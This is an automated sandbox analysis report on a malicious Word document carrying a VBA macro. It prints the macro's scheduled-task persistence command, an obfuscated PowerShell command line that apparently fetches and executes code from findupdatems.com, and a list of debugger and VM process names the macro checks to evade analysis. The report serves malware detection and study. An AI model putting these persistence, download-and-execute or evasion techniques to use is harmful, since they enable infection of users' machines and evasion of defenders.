
Analysis Report 18#U042f.doc

Overview

General Information

Joe Sandbox Version: 24.0.0 Fire Opal
Analysis ID: 64199
Start date: 17.11.2018
Start time: 22:53:54
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 11m 59s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 18#U042f.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winDOC@25/12@1/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Simulate clicks
  • Number of clicks 343
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, OSPPSVC.EXE
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy  | Score | Range   | Reporting      | Detection
Threshold | 100   | 0 - 100 | Report FP / FN | malicious

Confidence

Strategy  | Score | Range | Further Analysis Required? | Confidence
Threshold | 5     | 0 - 5 | false                      | (graphic)


Classification

Analysis Advice

All domains contacted by the sample do not resolve. Likely the sample is an old dropper which no longer works
Sample might require command line arguments, analyze it with the command line cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Mitre Att&ck Matrix

Techniques are listed per tactic column; digits following a technique name are the count badges from the report, reproduced as extracted.

Initial Access: Valid Accounts; Replication Through Removable Media; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link
Execution: Command-Line Interface 11; Scheduled Task 1; PowerShell 1; Scripting 32; Exploitation for Client Execution 11
Persistence: Scheduled Task 1; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification
Privilege Escalation: Process Injection 11; Scheduled Task 1; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness
Defense Evasion: Disabling Security Tools 1; Process Injection 11; Deobfuscate/Decode Files or Information 1; Scripting 32; Masquerading
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation
Discovery: Process Discovery 1; Security Software Discovery 211; Remote System Discovery 1; System Information Discovery 12; Remote System Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer
Command and Control: Standard Non-Application Layer Protocol 1; Standard Application Layer Protocol 1; Custom Cryptographic Protocol; Multiband Communication; Standard Cryptographic Protocol

Signature Overview



AV Detection:

Antivirus detection for submitted file
Source: 18#U042f.doc; Avira: Label: W97M/Hancitor.hwhzo
Multi AV Scanner detection for submitted file
Source: 18#U042f.doc; virustotal: Detection: 61%
Yara signature match
Matched rule: PowerShell_Case_Anomaly (date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =) in the following sources, type: MEMORY:
  • 00000007.00000002.2369970087.058E0000.00000004.sdmp
  • 0000000C.00000002.2380851729.06F8A000.00000004.sdmp
  • 0000000C.00000003.2186142865.005BA000.00000004.sdmp
  • 00000007.00000002.2365632769.00600000.00000004.sdmp
  • 00000007.00000002.2365595933.005DE000.00000004.sdmp
  • 0000000C.00000002.2374595497.00910000.00000004.sdmp

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\schtasks.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic; DNS query: name: findupdatems.com

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2026620 ET TROJAN Hades APT Domain in DNS Lookup (findupdatems .com) 192.168.0.60:59807 -> 8.8.8.8:53
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown; DNS traffic detected: query: findupdatems.com reply code: Server failure (2)
Found strings which match known social media URLs
Source: powershell.exe, 0000000C.00000002.2373521067.004F0000.00000004.sdmp; String found in binary or memory: Microsoft.AspNet.Mvc.Facebook equals www.facebook.com (Facebook)
Performs DNS lookups
Source: unknown; DNS traffic detected: queries for: findupdatems.com
URLs found in memory or binary data
Source: powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000C.00000003.2186142865.005BA000.00000004.sdmp; String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://findupdatems.com
Source: powershell.exe, 0000000C.00000002.2378942518.05347000.00000004.sdmp, PowerShell_transcript.424505.Y2llNals.20181118102015.txt.12.dr; String found in binary or memory: http://findupdatems.com/ch
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://findupdatems.com/check/index
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://findupdatems.com/check/indexHlj)4jzIEX$
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://findupdatems.com/check/indexd
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Management.Automation
Source: powershell.exe, 0000000C.00000002.2378186888.04F04000.00000004.sdmp; String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Management.Automationl
Source: powershell.exe, 0000000C.00000002.2377895660.04D60000.00000004.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 18#U042f.doc; String found in binary or memory: http://shopster.ua
Source: 18#U042f.doc; String found in binary or memory: http://shopster.ua/
Source: powershell.exe, 0000000C.00000002.2383934340.08D20000.00000004.sdmp; String found in binary or memory: http://www.microsoft.c

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function NAPHLPR, API IWshShell3.Run("schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta C:\Users\user\AppData\Roaming\WPFT532.hta"",0:Integer,True); Name: NAPHLPR (2 identical entries)
Document contains an embedded VBA macro with suspicious strings
Source: 18#U042f.doc; OLE, VBA macro line: KYC2525E = Environ(MSART8("FUUIFYF"))
Source: 18#U042f.doc; OLE, VBA macro line: Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True)
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function Frame1_Layout, String WsCRiPT.Shell; Name: Frame1_Layout
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function fixer_base, String schtasks /Create /F /SC DAILY /ST "10:20" /TN "DriveCloudTaskCoreCheck" /TR "mshta random_name"; Name: fixer_base (2 identical entries)
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function KYEPC270, String PowERsheLl_iSE; Name: KYEPC270
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function J0289430, String \WPFT532.hta; Name: J0289430
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function J0289430, String environ: KYC2525E = Environ(MSART8("FUUIFYF")); Name: J0289430
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function J0289430, String createtextfile: Set kerberos = objFSO.CreateTextFile(KYC2525E & KBDUGHR1, True); Name: J0289430
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Source: 18#U042f.doc; Stream path 'Macros/VBA/ThisDocument': found possibly 'WScript.Shell' functions exec, run, environ
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Source: 18#U042f.doc; OLE indicator, ObjectPool: true
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: 18#U042f.doc; OLE, VBA macro line: Sub Frame1_Layout()
Source: VBA code instrumentation; OLE, VBA macro: Module ThisDocument, Function Frame1_Layout; Name: Frame1_Layout
Document contains embedded VBA macros
Source: 18#U042f.doc; OLE indicator, VBA macros: true
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Classification label
Source: classification engine; Classification label: mal100.expl.evad.winDOC@25/12@1/0
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Temp\CVR654D.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word file
Source: 18#U042f.doc; OLE indicator, Word Document stream: true
Document contains summary information with irregular field values
Source: 18#U042f.doc; OLE document summary: title field not present or empty
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\35849a60913000fe067eb742f5cabec9\mscorlib.ni.dll
Queries process information (via WMI, Win32_Process)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; WMI Queries: IWbemServices::ExecQuery - root\ciMV2 : SELECT NamE FROM WIn32_PRoCEsS (4 identical entries)
Reads ini files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File read: C:\Users\desktop.ini
Reads software policies
Source: C:\Windows\splwow64.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus
Source: 18#U042f.doc; virustotal: Detection: 61%
Spawns processes
Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\18#U042f.doc
Source: unknown; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown; Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' (4 identical entries)
Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4 (5 identical entries)
Source: unknown; Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Roaming\WPFT532.hta
Source: unknown; Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: unknown; Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%
Source: unknown; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe '
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta' (4 identical entries)
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\cmd.exe with the same obfuscated 'Set AYW= -jOIn[CHAr[]] ...' command line listed above
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe '
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Uses an in-process (OLE) Automation server
Source: C:\Windows\splwow64.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a06-f192-11d4-a65f-0040963251e5}\InProcServer32
Reads internet explorer settings
Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder; Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9177_none_5093cc7abcb795e9\MSVCR90.dll

Data Obfuscation:

Obfuscated command line found
Source: unknown; Process created: C:\Windows\System32\cmd.exe with the obfuscated 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, ...' command line (listed in full under Spawns processes)
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\cmd.exe with the same obfuscated 'Set AYW=' command line
PowerShell case anomaly found
Source: unknown; Process created: C:\Windows\System32\cmd.exe with the same obfuscated 'Set AYW=' command line (2 identical entries)
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - (2 identical entries)
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\cmd.exe with the same obfuscated 'Set AYW=' command line (2 identical entries)
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen - (2 identical entries)

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown; Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /F /SC DAILY /ST '10:20' /TN 'DriveCloudTaskCoreCheck' /TR 'mshta C:\Users\user\AppData\Roaming\WPFT532.hta'

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX (79 identical entries)
Source: C:\Windows\System32\mshta.exe, Process information set: NOOPENFILEERRORBOX (20 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX (84 identical entries)
SetErrorMode with SEM_NOOPENFILEERRORBOX only suppresses the dialog Windows would otherwise show when a file cannot be found. Legitimate applications, Word and PowerShell among them, set this flag in normal operation, so on its own the signature is low-fidelity; its value here is the process list it exposes, which shows mshta.exe and powershell.exe running alongside WINWORD.EXE during the analysis.

Malware Analysis System Evasion:

Evasive VBA macro found (process check)
Source: VBA code instrumentation, OLE, VBA macro: Module ThisDocument, Function KYEPC270 (Name: KYEPC270). The instrumented function compares each running process name, already lower-cased, against a fixed blacklist by calling InStr(<process name>, <needle>). The trace shows the names "system idle process", "system", "smss.exe" and "csrss.exe" being tested in turn; the captured report breaks off partway through the "csrss.exe" iteration, after the "vmtoolsd'" entry, so later processes are not listed. Each name is compared against the same 27 needles, in this order (the repeated entries and the trailing apostrophe on "vmtoolsd'" are present in the macro as captured): hacker, malzilla, procexp, wireshark, hxd, powershell_ise, ida, olly, fiddler, vmtoolsd, vmtoolsd, vmtoolsd, swingbox, vboxtray, vboxtray, secunia, hijack, vmtoolsd', vmtoolsd', vmtoolsd', vbox, vmware, vxstream, autoit, vmtools, tcpview, process explorer.
The needles cover debuggers and inspection tools (ida, olly, hxd, wireshark, fiddler, procexp, tcpview, powershell_ise), a sandbox vendor (vxstream) and VM guest agents (vmtoolsd, vmtools, vmware, vbox, vboxtray). Because the test is a plain substring match on the image name, a sandbox that renames its guest-agent binaries passes the check, while any legitimate process whose name happens to contain one of the needles trips it.
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("csrss.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("wininit.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","swingbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmware")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vxstream")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","autoit")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","vmtools")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","tcpview")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("winlogon.exe","process explorer")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hacker")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","malzilla")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","procexp")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","wireshark")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hxd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","powershell_ise")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","ida")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","olly")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","fiddler")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","swingbox")Name: KYEPC270
